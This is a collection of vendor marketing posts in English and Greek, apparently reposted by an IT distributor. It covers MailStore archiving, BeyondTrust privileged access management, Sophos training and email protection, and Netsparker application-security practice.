Five months after the last release, our new MailStore Server Version 13.2 is ready to hit the market! With data security having played the major role in recent versions, Version 13.2 places another aspect of our email archiving solutions, namely performance, under the spotlight. While the new release promises a significant hike in performance in a host of different areas of the software, it has also resulted in a sizable increase in the maximum number of users permitted in a single installation of MailStore Server®, which is targeted at small and mid-sized businesses. Let’s take a look at the details.

What Are the Benefits of Version 13.2?

Enhanced Performance: Faster Than Ever

This time, the main focus is product performance. Since releasing the last version, we’ve tweaked a few things under the hood, so to speak, and customers and users of all three email archiving solutions MailStore Server, the MailStore Service Provider Edition (SPE), and MailStore Home® can look forward to a major increase in performance.

“The boost in performance is perceptible in several areas of the software: for example, the process of rebuilding search indexes is much faster than it was before in all three archiving solutions,” enthuses Heiko Borchardt, Sales Engineer at MailStore Software GmbH. “As a member of the technical support team, I’m in contact with our customers on a daily basis and appreciate that a hike in performance not only delivers technical benefits, but enhances the user experience as well. Our customers are going to be really pleased with this.”

The new release introduces changes such as improved performance when reading recovery records, and performance-optimizing configuration options for archive stores (the latter only applies to MailStore Server and the MailStore SPE). While on the subject of archive stores, you’ll find a blog post with all the details here.

MailStore Server Can Now Be Used by Businesses With up to 2,000 Users

The significant increase in performance of our email archiving solutions comes with another great news: building on other improvements introduced in recent years, MailStore Server can now be used by businesses operating up to 2,000 users (if you have any questions about the system requirements, please contact our support team).

“Depending on the individual IT environment and email volume, our general recommendation was to have no more than 500 users in any single MailStore Server installation,” says Björn Meyn, Product Manager at MailStore Software GmbH. “So we’re really pleased, after extensive testing, to have been able to augment the user limit so significantly in Version 13.2. And our resellers also stand to benefit from this development.”

Other Improvements

In addition to the two highlights of enhanced performance and raising of the user limit, Version 13.2 comes with other improvements. For example, administrators of MailStore SPE can now activate their MailStore SPE installation via a conventional (i.e. non-transparent) proxy and run license reporting through that. Besides that, indexing of PDF attachments is now integrated in all products, thus eliminating the need to install external iFilters. Also, the .NET Core version embedded in MailStore Gateway has been upgraded to guarantee the highest level of security.

GDPR-Certified

As usual, we’ve had our business solutions MailStore Server and the MailStore SPE audited and certified by an independent data protection expert.

The audit was based on the General Data Protection Regulation (GDPR). This demonstrates that, when used appropriately, MailStore Server and the MailStore SPE meet all relevant requirements governing the processing of personal data set out in the GDPR.

You can request a copy of the official audit certificate from sales@mailstore.com. Registered MailStore partners can download the certificates from our Partner Portal or request it by email from partners@mailstore.com.

Availability

You can download MailStore Server, the MailStore SPE, and MailStore Gateway right now from the company website free of charge. Are you having problems updating to the latest version because your MailStore Server Update & Support Service has expired? If so, please get in touch with us to obtain an upgrade that will allow you to use the latest version of MailStore Server. It makes sense to have an active Update & Support Service for other reasons, too. Click here for a summary of the key arguments.

Interested companies can also download Version 13.2 as part of a free, 30-day trial.

Service providers interested in the MailStore SPE can register here free of charge to obtain all the relevant information, including access to a free trial version.

Home users can download the latest version of MailStore Home free of charge from the Products page of our website.

Source: MailStore

[vc_row][vc_column][vc_column_text]

Privileged Access & Session Management από την BeyondTrust

Καθώς η πανδημία του 2020 άλλαξε τον παραδοσιακό τρόπο εργασίας, οι εταιρείες αναγκάστηκαν να προσαρμοστούν ξεκινώντας να υποστηρίζουν πλήρως την απομακρυσμένη εργασία. Καθώς συνεχίζεται η διάθεση των εμβολίων, δεν είναι λίγες οι εταιρείες που ξεκίνησαν να καλωσορίζουν τους εργαζόμενους στο γραφείο. Αυτό ωστόσο δεν σημαίνει ότι όλες οι εταιρείες σχεδιάζουν να επιστρέψουν στα ίδια ακριβώς πράγματα με πριν.

Ανεξάρτητα από το που βρίσκεται η εταιρεία σας στο επόμενο κύμα εργασίας, η δημιουργία ενός σχεδίου για την αντιμετώπιση του φυσικού, ψηφιακού ή ανθρώπινου στοιχείου θα διατηρήσει τα δεδομένα ασφαλή και τους ανθρώπους σας υγιείς.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]

“Το 80% των παραβιάσεων είναι αποτέλεσμα
της κατάχρησης ή της κακής χρήσης
προνομιακών διαπιστευτηρίων”

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]

Το PAM εξακολουθεί να αποτελεί υψηλή προτεραιότητα καθώς αρκετές, υψηλού προφίλ παραβιάσεις, συνδέονται με παραβιασμένα/ κλεμμένα διαπιστευτήρια προνομιακών λογαριασμών

Αν προστεθούν και η επιταχυνόμενη μετάβαση στο cloud, η ασάφεια μεταξύ των περιμέτρων ασφάλειας των επιχειρήσεων και η συνολική αύξηση του αριθμού των κυβερνοεπιθέσεων, όλα μαζί, συμβάλλουν στην αύξηση της υιοθέτησης του PAM.

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]Το παραπάνω έρχεται σε συνάρτηση με ότι έχουν δει στη BeyondTrust την τελευταία χρονιά, καθώς οι οργανισμοί συνεχίζουν να υιοθετούν και να εξελίσσουν τις PAM λύσεις τους πέρα ​​από τα απλά/ βασικά προϊόντα PASM, ώστε να περιλαμβάνουν Διαχείριση κλιμάκωσης και εκχώρησης προνομίων (PEDM), Διαχείριση μυστικών και λύσεις Απομακρυσμένης προνομιακής πρόσβασης. Η BeyondTrust προσφέρει το ευρύτερο προϊοντικό χαρτοφυλάκιο PAM στην αγορά έχοντας μάλιστα μεγάλη δύναμη στο PEDM (αναβάθμιση και ανάθεση προνομίων / Privilege Elevation & Delegation) για Windows, Mac, Unix και Linux.

Οι οργανισμοί αναγνωρίζουν ότι η ασφάλεια της απομακρυσμένης πρόσβασης είναι απαραίτητη για τη νέα κανονικότητα της εργασίας από οπουδήποτε (WFA, Work-From-Anywhere), της υβριδικής εργασίας και του επιταχυνόμενου ψηφιακού μετασχηματισμού.

Η BeyondTrust κατέκτησε την αγορά και συνεχίζει να ηγείται
στην αγορά των λύσεων ασφαλούς απομακρυσμένης πρόσβασης

Mε ώριμα προϊόντα απομακρυσμένης προνομιακής πρόσβασης και απομακρυσμένης υποστήριξης, τα οποία είναι χρόνια μπροστά από τα προϊόντα άλλων προμηθευτών PAM όσον αφορά το βάθος και το εύρος των δυνατοτήτων τους.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]

Η ασφάλεια των δικτύων OT (Τεχνολογία Αυτοματισμού, Operational Technology) στο επίκεντρο

Στο Magic Quadrant™ for Privileged Access Management, η Gartner επισημαίνει την αυξανόμενη ανάγκη και ζήτηση για την επέκταση της προνομιακής πρόσβασης σε περιβάλλοντα OT. Αν και το PAM είναι συνήθως μια οριζόντια λύση, με αυξανόμενη ζήτηση από τους τομείς της υγειονομικής περίθαλψης, της βιομηχανίας και των φυσικών πόρων, έκανε την εμφάνιση της μία νέα ανάγκη από «κάθετη» άποψη για συγκεκριμένα χαρακτηριστικά από οργανισμούς που χρησιμοποιούν IoT και OT. Σε αυτούς, περιλαμβάνονται εταιρείες από τον χώρο των υπηρεσιών κοινής ωφέλειας και της ενέργειας καθώς και τα νοσοκομεία. Οι συγκεκριμένοι οργανισμοί χρειάζονται να προστατεύσουν την προνομιακή πρόσβαση στις συσκευές εποπτικού ελέγχου και συλλογής δεδομένων (SCADA) και στις συσκευές OT τους και απαιτούν προ-ρυθμισμένους συνδέσμους σε δημοφιλή συστήματα OT.

Οι λύσεις PAM της BeyondTrust λειτουργούν με «integrated» τρόπο για να ενοποιήσουν τον έλεγχο σε ολόκληρο το σύμπαν των προνομίων σας και να μειώσουν δραστικά την επιφάνεια επίθεσης. Η ικανότητα της να προστατεύει κάθε προνομιούχο χρήστη (άνθρωπο, μηχανή, προμηθευτή, υπάλληλο), κάθε περιουσιακό στοιχείο και κάθε συνεδρία μέσω της πλατφόρμας PAM καθιστά την BeyondTrust τον καλύτερο πάροχο λύσεων PAM για να συνεργαστείτε καθώς οι οργανισμοί καλούνται να λειτουργήσουν στη νέα κανονικότητα και με τα προνόμια σε πολλαπλάσιο βαθμό.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]

Η NSS είναι διεθνής διανομέας Value Added Distributor (VAD) λύσεων πληροφορικής υψηλής τεχνολογίας έχει στρατηγική συνεργασία με την BeyondTrust, παγκόσμιο ηγέτη στη διαχείριση προνομιακής πρόσβασης (Privileged Access Management) και ασφαλούς απομακρυσμένης πρόσβασης (Secure Remote Access), και είναι σε θέση να αξιοποιεί πλήρως το μοντέλο Universal Privilege Management της BeyondTrust, συνδυάζοντας την τεχνογνωσία και τη βαθιά γνώση της αγοράς

[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_button button_color=”color-283957″ size=”btn-xl” radius=”btn-round” border_animation=”btn-ripple-in” border_width=”0″ link=”url:mailto%3Asales%40nss.gr|||” icon=”fa fa-hand-o-right”]Μπορείτε να επικοινωνήσετε μαζί μας στο sales@nss.gr ή στο +30 211 8000 330[/vc_button][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_separator sep_color=”color-150912″][vc_custom_heading text_weight=”200″ text_height=”fontheight-357766″ text_color=”color-283957″]Μάθετε περισσότερα για το PAM της BeyondTrust[/vc_custom_heading][contact-form-7 id=”101372″ title=”Μάθετε περισσότερα…”][vc_separator sep_color=”color-150912″][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][/vc_column][/vc_row]

[vc_row][vc_column][vc_single_image media=”101283″ media_width_percent=”100″ alignment=”center”][vc_button button_color=”color-150912″ size=”btn-xl” border_animation=”btn-ripple-out” custom_typo=”yes” font_family=”font-762333″ font_weight=”900″ letter_spacing=”fontspace-210350″ border_width=”2″ display=”inline” link=”url:mailto%3Asales%40nss.gr%3Fsubject%3DSophos%20XG%20Administration%20Training%26body%3DI%20would%20like%20to%20participate%20in%20the%20XG%20Administration%20Training%20on%20October%2026th%20and%2027th%2C%202021|||” icon=”fa fa-hand-o-right”]Book Your Certification Today![/vc_button][vc_column_text]This course is designed for technical professionals who will be administering Sophos XG Firewall and provides the skills necessary to manage common day-to- day tasks.

On completion of this course, trainees will be able to: 

• Explain how XG Firewall help to protect against security threats
• Configure firewall rules,policies and user authentication.
• Demonstrate threat protection and commonly used features
• Perform the initial setup of an XG Firewall and configure the required network settings
• Identify and use troubleshooting tools, reporting and management tasks

Prerequisites

There are no prerequisites for this course; however, it is recommended you should:

• Be knowledge of networking
• Be familiar with security best practices
• Experience configuring network security devices

Certification

To become a Sophos Certified Administrator, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80%, and is limited to 4 attempts.

Content

• Module 1: XG firewall Overview
• Module 2: Getting started with XG firewall
• Module 3: Network Protection
• Module 4: Webserver protecion
• Module 5: Site to site connections
• Module 6: Authentications
• Module 7: Webprotection and Application control
• Module 8: Application control
• Module 9: Email Protection
• Module 10: wireless protection
• Module 11: Remote Access
• Module 12: Logging, Reporting and Central Management

[/vc_column_text][vc_empty_space empty_h=”3″][vc_button button_color=”color-150912″ size=”btn-xl” border_animation=”btn-ripple-out” custom_typo=”yes” font_family=”font-762333″ font_weight=”900″ letter_spacing=”fontspace-210350″ border_width=”2″ display=”inline” link=”url:mailto%3Asales%40nss.gr%3Fsubject%3DSophos%20XG%20Administration%20Training%26body%3DI%20would%20like%20to%20participate%20in%20the%20XG%20Administration%20Training%20on%20October%2026th%20and%2027th%2C%202021|||” icon=”fa fa-hand-o-right”]Book Your Certification Today![/vc_button][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]

Certification

+ exam: Sophos XG Administrator

Duration

2 days + Labs

Agenda

Trainer: Micheal Eleftheroglou

Day 1 Tuesday 26 October 2021 

9:30-10:30 Module 1: XG firewall Overview

10:30-10:45 Break

10:45-12:30 Module 2: Getting started with XG firewall

12:30-13:00  Labs (getting familiar)

13:00-13:30 Lunch

13:30-14:30 Module 3: Network Protection

14:30-15:30  Module 4: Webserver Protection

15:30-15:45 Break

15:45- 17:05 Module 5: Site to Site Connection

Day 2  Wednesday 27 October 2021 

9:00-10:20  Module 6: Authentications

10:20-11:20 Module 7: Web Protection and Application Control

11:20-11:30 Break

11:30-12:00  Module 8: Application Control

12:00-12:50  Module 9: Email Protection

12:50-13:30 Lunch

13:30-14:15 Module 10: Wireless Protection

14:15-15:05  Module 11: Remote Access

15:05-15:20 Break

15:20- 16:20 Module 12: Logging, Reporting and Central Management

16:20 Labs discussion[/vc_column_text][vc_empty_space empty_h=”3″][vc_button button_color=”color-150912″ size=”btn-xl” border_animation=”btn-ripple-out” custom_typo=”yes” font_family=”font-762333″ font_weight=”900″ letter_spacing=”fontspace-210350″ border_width=”2″ display=”inline” link=”url:mailto%3Asales%40nss.gr%3Fsubject%3DSophos%20XG%20Administration%20Training%26body%3DI%20would%20like%20to%20participate%20in%20the%20XG%20Administration%20Training%20on%20October%2026th%20and%2027th%2C%202021|||” icon=”fa fa-hand-o-right”]Book Your Certification Today![/vc_button][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][vc_single_image media=”101283″ media_width_percent=”100″ alignment=”center” shape=”img-round” radius=”std”][/vc_column][/vc_row][vc_row][vc_column width=”1/1″][/vc_column][/vc_row]

To protect your users’ inboxes from phishing, look no further than Sophos Email. Alongside advanced anti-spam and malware protection powered by SophosLabs, Sophos Email includes multiple layers of technology to keep your email phish-free.

Advanced machine learning identifies phishing imposters and BEC attacks

Criminals often impersonate key individuals in an organization to trick other employees into falling for their scams. Sophos Email uses advanced machine learning to detect targeted impersonation and Business Email Compromise attacks. Utilizing the deep learning neural network created by Sophos AI, Sophos Email analyzes email body content and subject lines for tone and wording to identify suspicious conversations.

For added protection, Sophos Email also includes a setup assistant that integrates with AD Sync to automatically identify the individuals within an organization who are most likely to be impersonated. It scans all inbound mail for display name variations associated with those users, further extending protection against phishing imposters.

Real-time scanning blocks social engineering techniques

Adversaries are experts at using social engineering in their attacks. That’s why Sophos Email scans all inbound messages for key phishing indicators such as brand spoofing and impersonation attempts in real-time using SPF, DKIM, and DMARC authentication techniques and email header anomaly analysis. It spots and blocks phishing emails before they reach your users.

Pre and post delivery protection stops malicious links and malware

The danger with phishing is not the email itself but what it gets people to do. Phishing emails often include malicious links and malware that attackers try to trick you into activating. Sophos Email’s real-time URL scanning and AI-powered cloud sandbox protect against malicious URLs and attachments, ensuring malware never reaches your users’ inboxes.

To avoid detection, attackers sometimes update the link in an email after it has landing in the victims’ inboxes, for example, re-directing safe URLs to malicious ones, or insert malware into a previously-clean web page. Time-of-Click URL rewriting analyzes all URLs at the moment they are clicked, and automatically removes dangerous emails to protect against these post-delivery techniques.

Sophos Email’s Search and Destroy capabilities take this one step further, directly accessing Office 365 mailboxes, to identify and automatically remove emails containing malicious links and malware at the point the threat state changes and before a user ever clicks on them.

Learn more

To find out more head to sophos.com/email. You can start a free trial directly from our website, and if you’re already using Sophos Central you can activate a trial directly within your console in just two clicks.

Source: Sophos

Phishing is still an effective cyberattack technique because it constantly evolves. To keep up, your phishing defenses need to evolve too.

Our new report, Phishing Insights 2021, reveals the state of phishing and cybersecurity user education based on an independent survey of 5,400 IT professionals. Use it to evaluate your own phishing security posture and identify opportunities to evolve your defenses.

It also provides a real-world case study of a phishing email that led to a multi-million dollar ransomware attack.

Phishing means different things to different people

What is phishing? One of the findings from the survey is that even among IT professionals there is wide variation in what people consider to be a phishing attack. The most common understanding is emails that falsely claim to be from a legitimate organization, usually combined with a threat or request for information. While this was the most popular answer, fewer than six in ten (57%) respondents selected this option, illustrating the breadth of meanings understood by phishing.

46% of respondents consider Business Email Compromise (BEC) attacks to be phishing, while over a third (36%) understand phishing to include threadjacking i.e. when attackers insert themselves into a legitimate email thread as part of an attack.

With this extensive variation in understanding of phishing attacks among IT professionals, it’s reasonable to expect a similar or greater range of interpretations among non-IT employees.

This is a useful reminder to be mindful of the different interpretations of the word ‘phishing’ when providing educational resources and user awareness training. Without the correct context, the training will be less effective.

Phishing has increased since the pandemic

70% of survey respondents reported an increase in phishing attacks on their organization since the start of the pandemic. All sectors were affected, with central government experiencing the highest increase (77%), closely followed by business and professional services (76%) and healthcare (73%).

Fortunately, 98% of organizations had their phishing awareness program in place before COVID-19 hit. Thanks to these programs, employees will have been well placed to withstand the barrage of phishing emails over the last year.

While this is good news, it’s also a reminder to regularly review and update phishing awareness materials and activities to keep them fresh and relevant.

Case study: From phish to multi-million-dollar ransomware attack

Invariably, phishing is just one part of a cyberattack. When a victim falls for a phish, it set off a chain of events that can lead to a devastating attack many weeks or months later.

The Sophos Rapid Response team was recently called in to assist a company experiencing a major ransomware attack that started with a phishing email. As the timeline shows, three months passed between the initial phish and the release of the ransomware payload, with multiple adversaries playing different roles in the attack.

Read the full report

Download the full Phishing Insights 2021 report to dive deeper into the state of phishing and cybersecurity user education, and the timeline of this attack.

Get AI-powered phishing protection with Sophos Email

Sophos Email has multiple layers of technology to protect your users’ inboxes from phishing, and is managed from the same Sophos Central platform as our other next-gen solutions – learn more.

Source: Sophos

Sophos Managed Threat Detection, a new service from the Sophos Managed Threat Response (MTR) team, is available since July 2021.    

Sophos Managed Threat Detection provides 24/7 threat monitoring, and it is designed to run in parallel with non-Sophos endpoint protection products, which means you can continue to use your current endpoint protection while enjoying the peace of mind that comes with being monitored by Sophos threat experts. 

Managed Threat Detection is tuned to detect suspicious activity that your non-Sophos endpoint may miss or is unable to convict. For example, Ransomware pre-execution and at runtime activity, Active Adversary activities and Persistence. Depending on their severity detections will generate cases. All cases are validated by an analyst before notifying the customer. In this way the service is doing the heavy lifting to ensure customers are provided actionable intelligence and not overloaded with alerts. 

Clear communication is critical when running a security operations program. This is why the Managed Threat Detection service provides a steady stream of information, including weekly and monthly reports, email threat notifications in real time, and a dashboard in Sophos Central. 

If incident response help is needed to respond to an active threat the Sophos Rapid Response team is available as an additional service. Sophos Rapid Response provides fast, remote emergency assistance to investigate and neutralize active threats. Sophos customers have a built-in speed advantage since the Rapid Response incident response team will have immediate access to the telemetry and data recorder provided by the Managed Threat Detection agents. 

Source: Sophos

Google Workspace, which was known as Google G-Suite until October 2020, is a communication and collaboration environment that facilitates digital collaboration in many different ways. In many scenarios, however, Google Vault (Workspace’s native data management tool) fails to meet compliance requirements of a professional email archiving system. Therefore, it can make sense for your company to use a third-party archiving solution in combination with Google Workspace.

Why Do Emails Need to Be Archived?

In many companies, emails are the medium of choice when it comes to transmitting business data and information. A company’s email inventory will therefore include large amounts of critical information such as contracts, invoices, personnel data, and purchase orders – all of which need to be properly retained.

Depending on the country and industry sector, different legal requirements can apply when emails are processed and the data they contain stored over long periods of time so that they are permanently available. This applies particularly to heavily regulated sectors such as healthcare and the financial industry, as well as to government institutions and educational establishments in which sensitive personal data are often sent and received by email.

Failure to comply with the laws on email archiving can have serious consequences: for instance, a breach of archiving duties can result in fines and other sanctions and, in certain circumstances, even litigation under civil law. And another example: in the event of litigation where emails are used as evidence, or where data subjects are asserting their rights under the EU’s General Data Protection Regulation (GDPR), your company may need to search through its entire inventory of emails quickly and efficiently. This is much easier with the help of a professionally managed email archive.

Email Archiving and IT Strategy

In light of increasingly severe privacy legislation (e.g. the  CPA in California, HIPAA, and FERPA in the USA) and compliance regulations, together with the enduring popularity of electronic correspondence, every company should be proactive in its approach to email archiving. Professional archiving of business-relevant emails is not just the cornerstone of an overarching email management concept; it should be part-and-parcel of any IT strategy. Ultimately with archiving you can make sure that all your emails, including any file attachments, are retained fully in a tamper-proof manner so that they are available at all times.

Isn’t It Enough to Back Up Emails?

Email archiving and email backups are important instruments in the context of business continuity, but they are not mutually exclusive. As a rule, backups serve to protect data (ideally, including the email archive itself) in the medium to short term so that this information can be restored as required. They ensure that business-critical systems and data can be accessed even in the event of system failure or a ransomware attack. In contrast, archiving enables emails to be stored for many years in a form that is faithful to the original, easy to find, and permanently available.

How Does Email Archiving With Google Vault Work?

Google Workspace offers its users Google Vault, a software tool for information management and eDiscovery. Therefore, Workspace users with a valid Vault license (see below) can store large amounts of data for any length of time, including not only emails, but also files from other Workspace programs such as Google Drive, Chat, Groups, and Meet.

Who Can Use Google Vault?

Google Vault licenses for every company employee are included in the “Business Plus” and “Essentials” Workspace packages, as well as in the “Enterprise” and “Education” versions. However, if you have opted for the more affordable “Frontline”, “Business Starter” and “Business Standard” plans, you will need to purchase Vault user licenses on a monthly basis for every employee whose emails are to be archived.

With Google Vault, all the data you generate and process within your workspace can be clustered by subject, arranged into hierarchies, and visualized and exported. Administrators with the appropriate authorization can search stored data by user account, organizational unit, date, or according to certain keywords.

Authorized users can use Google Vault to view history logs, assign privileges, and manage user accounts. This can be helpful in the event of investigations, audits, and litigation where you may need to quickly access critical information held in the archive. Our white paper entitled “The Benefits of an Independent Email Archiving Solution for Users of Google Workspace” gives you detailed information on everything you need to look out for, including the role played by “holds”, and the risks that can arise if you omit to define retention rules.

What Are Google Vault’s Limitations in Terms of Email Archiving?

With Google Vault, your company can store emails and file attachments over long periods of time. According to Google, once you consent to the addendum on data processing and accept the standard contractual clauses for Google Workspace and Cloud Identity, you will meet the adequacy and security requirements defined under the EU’s GDPR. And in US geographic locations, once you accept Google’s amendment agreement for business partners, you will be “HIPAA-compliant”.

That being said, it is difficult to generalize as to whether Google Vault can meet your requirements in terms of retention and usability due to the inherent weaknesses and vulnerabilities of the solution. These include, for example, limited export functions and the risk of data loss if users or licenses are deleted. In our white paper we look at what is behind these issues and analyze some of the other vulnerabilities you may encounter.

Conclusion

Email archiving is a key component of a company’s IT strategy and information management policy. Google Vault, Workspace’s native tool for managing data and information, can be a valuable aid in this context. It does, however, come with certain vulnerabilities that can give rise to compliance and legislative issues, and you might be better off choosing independent, third-party software that has email archiving as its specialty.

Should you require detailed information on the drawbacks you can expect to encounter with Google Vault, and in which areas Google Workspace users could benefit from third-party software, we recommend our white paper.

Download Here

Source: MailStore

Shifting left has been a buzzword in the application security space for several years now, and with good reason – making security an integral part of development is the only practical approach for modern agile workflows. But in their drive to build security testing into development as early as possible, many organizations are neglecting application security in later phases and losing sight of the big picture.

Shifting left: misunderstood, misapplied, and absolutely necessary

In the AppSec industry, we’ve been repeating the shift left mantra for years, saying over and over that the only way to ensure effective and efficient application security testing is to integrate it with the development process. While absolutely true, this includes one tiny yet critical assumption: that you are also doing application security testing on the right, i.e. in staging and production. What’s more, the very term “shift left” can be misunderstood as moving all security testing to development – and doing that can leave gaping holes in your security.

Let’s say you do extensive security testing during development, and you feel pretty confident that as they go into staging and production, your applications contain no significant vulnerabilities. But even if that is true (and that’s a big “if”), vulnerabilities might crop up after deployment due to configuration or version differences. New vulnerabilities may be discovered in your technology stack, whether in frameworks, libraries, or other components. New attack techniques may appear in the wild. And finally, your security testing will only cover new and updated code that goes through your left-shifted pipeline – existing sites and applications will be untouched by security testing, as will third-party products that are used in your organization.

There is no question that extending security testing tools and workflows to involve the developers is a must if security is to keep up with the pace of change enforced by agile development. In fact, we have a whole white paper about it. But checking new code for vulnerabilities is only one piece of the security puzzle – and to build the complete puzzle, you need a broader view.

Building an AppSec program that works

Professional web development is not easy. Developers already have their hands full making features work while keeping up with the latest technologies and meeting all the requirements and release deadlines. If you decide to shift security testing left by simply bolting on more test tools, you are piling even more tasks and alerts onto your overworked devs. Unless they are actionable, the extra alerts will only increase noise for little security benefit.

One way to deal with this while keeping sight of the big picture is to base your application security program around dynamic application security testing (DAST). Modern DAST solutions are accurate enough to provide useful feedback to developers but also versatile enough to operate in all stages of development, testing, and production. Invicti products also feature asset discovery, so you always know what you have and what you need to secure.

For Netsparker specifically, a crucial benefit is that with Proof-Based Scanning technology, you can provide developers with actionable reports about real, exploitable vulnerabilities, complete with best-practice remediation guidance. Using out-of-the-box integrations with popular issue trackers, you can even automatically create tickets in the tools your teams already use. And when the additional IAST module is deployed, vulnerability reports for developers can include details down to the specific line of code, making remediation much easier.

This completely changes the dynamics of application security testing. Instead of a flood of vague recommendations saying “this bit could be insecure, you may want to take a look,” developers get factual, actionable tickets in their favorite issue tracker. Instead of rewriting code to make the alert go away, they know that they are fixing a specific and exploitable vulnerability that malicious actors could use to attack the application. That way, the extra work done on security issues makes a real and measurable difference to your overall security posture.

Reducing and avoiding security debt

The idea of technical debt is well-known in the development world. You might have lots of code that depends on an outdated library, but the old library is still good enough. Updating all that code would mean lots of extra work and testing, so it always gets put off for later in favor of more urgent and valuable projects. This technical debt often accumulates until something breaks, and then you fix it because you really have to. Now apply this exact same concept to security, replacing “until something breaks” with “until you have a breach” – and you have your security debt.

For application security, this debt can accumulate on many levels, from using known vulnerable components to treating your web application firewall (WAF) as a long-term solution rather than a band-aid until a vulnerability fix is ready. You might even get recurring debt, where the same types of vulnerabilities keep coming up over and over again due to poor coding practices or insufficient remediation guidance. All this adds up until many organizations give up on systematically securing all their applications because no matter what they do, their security backlog keeps growing.

The only way to deal with security debt is to resolve security issues as you go rather than sweeping them under the carpet. To get there, you need to give your developers the tools and processes to fix vulnerabilities quickly and permanently. This is where the value of a DAST-centric shift-left program with a proof-based approach becomes evident. Focusing on actual weaknesses that could be exploited by attackers helps you continuously improve security and coding practices to prevent security issues from piling up.

Security is all about the big picture

Recent high-profile incidents are finally hammering home the message that in modern web security, there’s no such thing as an unimportant application. Attackers can pick their time and place even as the attack surface of applications (and organizations) continues to grow, spanning new and existing code, multiple web technology stacks, open-source libraries, third-party components, and more. To know your true security posture, you need to start with the big picture before drilling into specific vulnerabilities.

Modern vulnerability scanning solutions such as Netsparker by Invicti are highly accurate and can run full scans in a matter of hours and incremental scans in minutes. For existing applications, this allows you to scan your entire environment for vulnerabilities as often as you need – even daily if that’s what your security policy mandates. For security testing in the development pipeline, it means giving rapid and actionable feedback to developers who can then quickly and effectively fix security issues in their own code.

All the time, you have full visibility into your current security posture while also improving your long-term application security. And because you are working with reliable data, your security and development professionals are not wasting time on inefficient communication or misleading results.

This is shifting left done right.

Source: Netsparker

A third of retail organizations pay the ransom

To maintain the best possible security stance and protect your sensitive data against cyberattacks, you cannot just rely on security products alone. Here is a list of seven key elements that we believe should be considered in your web app security strategy.

1. Include everyone in security practices

Some businesses still believe that security should only be the concern of a specialized team. In the current business environment, such an approach is not viable:

• The increasing cybersecurity skill gap means that security teams are unable to catch up to business growth.
• A dedicated security team becomes a bottleneck in the development processes.
• If security is reactive, not proactive, there are more issues for the security team to handle.

The current best practice for building secure software is called SecDevOps. This approach, which goes further than DevSecOps, assumes that every person involved in web application development (and any other application development) is in some way responsible for security. Developers know how to write secure code. QA engineers know how to apply security policies to their tests. All the management and executives have security in mind when making key decisions.

An effective secure DevOps approach requires a lot of education. Everyone must be aware of the security threats and risks, understand potential application vulnerabilities, and feel responsible for security. While this requires a lot of time and effort, the investment pays off with top-notch secure applications.

2. Adopt a cybersecurity framework

Cybersecurity is very complex and requires a well-organized approach. It’s easy to forget about certain aspects and just as easy to fall into chaos. That is why many organizations base their security strategy on a selected cybersecurity framework.

A cybersecurity framework is a strategic approach that begins with detailed research on security risks and includes activities such as developing a cyber incident response plan along with suitable application security checklists. The bigger the organization, the more such a strategic approach is needed.

Another advantage of adopting a cybersecurity framework is the realization that all cybersecurity is interconnected and web security cannot be treated as a separate problem.

3. Automate and integrate security tools

In the past, security teams performed application security testing manually using dedicated security solutions. For example, a security researcher would first use a simple vulnerability scanner and then manually perform additional penetration testing using open-source tools. However, in the current security landscape, such an approach is not optimal. Just like in the whole IT industry, the most efficient IT security processes are based on automation and integration.

Many security tools are now developed with such automation and integration in mind. For example, business-grade vulnerability scanners are intended to be integrated with other systems such as CI/CD platforms and issue trackers. There are several advantages to such an approach:

• The less manual work, the less room for error. If security processes are automated and integrated, nobody can, for example, forget about scanning a web application before it is published.
• If security is integrated into the software development lifecycle (SDLC), issues can be found and eliminated much earlier. This saves a lot of time and makes remediation much easier.
• If security tools work together with other solutions used in software development, such as issue trackers, security issues can be treated the same as any other issue. Engineers and managers don’t lose time learning and using separate tools for security purposes.

4. Follow secure software development practices

There are two key aspects to secure software development:

1. Practices that help you make fewer errors when writing application code
2. Practices that help you detect and eliminate errors earlier

In the first case, software developers must be educated about potential security problems. They must understand SQL injections, cross-site scripting (XSS), cross-site resource forgery (CSRF), and more vulnerabilities and misconfiguration such as the ones listed in the OWASP Top 10. They must also know secure coding techniques required to prevent such vulnerabilities, for example, they must know how to prevent SQL injections.

In the second case, what helps most is scanning for security vulnerabilities as early as possible in the development lifecycle. If you integrate security tools into your DevOps pipelines, as soon as the developer commits new or updated functionality, they are informed about any vulnerabilities in it. Because this is done immediately, it also makes such vulnerabilities much easier to fix because the developer still remembers the code that they were working on. It also guarantees that the developer can correct their own code, and not waste time trying to understand code written by someone else a long time ago.

5. Use diverse security measures

There are many aspects of web security and no single tool can be perceived as the only measure that will guarantee complete safety. The key tool for web application security is the vulnerability scanner. However, even the best vulnerability scanner will not be able to discover all vulnerabilities such as logical errors or bypass complex access control/authentication schemes without human intervention.

Vulnerability scanning must not be treated as a replacement for penetration testing. Also, to fully secure web servers, vulnerability scanning must be combined with network scanning. Luckily, some vulnerability scanners are integrated with network security scanners, so the two activities may be handled together.

In addition to vulnerability scanners that are based on DAST or IAST technologies, many businesses additionally choose to use a SAST (source code analysis) tool at early stages, for example in the SecDevOps pipelines or even earlier, on developer machines. Such a tool is a very useful addition, but because of its limitations (such as the inability to secure third-party elements), it cannot replace a DAST tool.

Some businesses believe that the best way to protect against web-related threats is to use a web application firewall (WAF). However, a WAF is just a band-aid tool that eliminates potential attack vectors. While a WAF is an important part of a complete security suite for an enterprise and the best way to handle zero-day vulnerabilities through virtual patching, it should not be treated as the most important line of defense.

All in all, you should use diverse security measures, but you should not just believe that purchasing them and giving them to your security team will solve the problem. These security measures must be integrated with your entire environment and automated as much as possible. They are there to reduce the amount of work that the security team has, not increase it.

6. Perform security exercises

One of the best ways to check if your sensitive information is safe is to perform mock attacks. This is the key assumption behind penetration testing but penetration tests are just spot-checks. To fully and continuously evaluate your security stance, the best way is to perform continuous security exercises such as red team vs. blue team campaigns.

